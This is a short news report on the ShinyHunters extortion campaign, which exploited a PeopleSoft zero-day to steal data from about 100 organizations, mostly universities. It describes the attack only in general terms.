Critical PeopleSoft zero-day fuels extortion campaign against roughly 100 organizations

ShinyHunters, one of the world’s most prolific data theft and extortion groups, exploited a zero-day vulnerability in Oracle’s PeopleSoft suite to compromise organizations worldwide, stealing gigabytes of data and demanding payment to keep it private, according to Ars Technica and Google's Mandiant.

The flaw, tracked as CVE-2026-35273, carries a near-maximum severity rating of 9.8 and allows unauthenticated attackers to compromise PeopleSoft PeopleTools versions 8.61 and 8.62 over HTTP, according to Oracle's security alert. Mandiant reported that exploitation began 27 May 2026—two weeks before Oracle published its out-of-band advisory. Oracle has issued a stopgap mitigation but has not yet fully patched the flaw.

As of Wednesday, attackers had targeted roughly 300 endpoints belonging to about 100 organizations, 68 percent of them in higher education, Mandiant said. The University of Nottingham confirmed that a “significant” amount of student data was compromised after ShinyHunters published gigabytes of data it claimed to have stolen. Analysis of a script left on the group’s staging server shows the attackers mapped PeopleSoft and WebLogic configurations, compressed stolen data with the zstd tool, and exfiltrated it over SSH to their data leak site, which claimed 48GB from a single victim.

Active since at least 2019, ShinyHunters has breached Ticketmaster (through Snowflake), Spain's largest bank, Santander, and Salesforce—and through it, Google. The group gains access via software exploits, cloud misconfigurations, stolen OAuth tokens, supply chain attacks, and voice phishing.

PeopleSoft remains widely deployed across government and university HR, payroll, and financial systems.